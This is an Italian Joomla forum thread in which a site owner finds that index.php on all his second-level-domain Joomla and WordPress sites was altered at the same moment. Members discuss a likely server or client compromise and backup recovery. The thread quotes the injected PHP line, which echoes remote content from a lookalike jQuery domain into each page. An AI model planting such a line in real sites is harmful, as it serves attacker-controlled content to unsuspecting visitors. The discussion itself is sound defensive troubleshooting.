index.php modificato

robjrobj

Mi stanno arrivando notifiche su praticamente tutti i siti joomla fatti di modifiche fatte al file index.php, praticamente contemporaneamente, la cosa viene segnalata Admin Tool
Secondo voi a cosa si può attribuire questa cosa?

Gioacchino

Hai fatto degli aggiornamenti del core?

robjrobj

no non ci sto lavorando

robjrobj

tutti i file index.php dei miei siti sono stati modificati oggi
l'unica linea che mi sembra non buona mi sembra questa

echo file_get_contents('https://jqeury.store/resources.php');

robjrobj

A quanto pare questa linea di codice è stata aggiunta in tutti i file index.php, sia ai siti fatti in joomla che in wordpress, di secondo livello
ai domini di terzo livello questa riga non è stata aggiunta

matty80

È molto probabile che ti abbiano defacciato.
Versione Joomla? Componenti installati? Sono aggiornati? Hai provato a scansionare alla ricerca di codice malevolo?

robjrobj

però mi sembra strano su tutti i siti... non hanno tutti gli stessi componenti e non tutte le versioni sono uguali... inoltre anche l'unico sito in wordpress boh

matty80

Sono sullo stesso server? Utilizzi quei piani che raggruppano siti web?

jabba

Anche secondo me ti hanno bucato i siti. Se sono sullo stesso server forse hanno bucato proprio io server (la macchina) e modificato massicciamente i file. Oppure hanno bucato il tuo PC e il programma che usi per collegarti ai siti (tipo filezilla?). In generale chiederei al tuo hosting se ha qualche info in più, per esempio se sanno chi e quando ha modificato quei file

robjrobj

Ho un piano reseller
ho contattato l'assistenza vediamo cosa mi dicono
mamma che agitation!

matty80

Hai dei backup puliti al di fuori del server?

robjrobj

backup di akeeba e dell'hosting

matty80

Quelli di akeeba sono in un formato compresso, dovrebbero essere buoni.
È consigliato tenere i backup in uno spazio al di fuori del server per i motivi di cui sopra.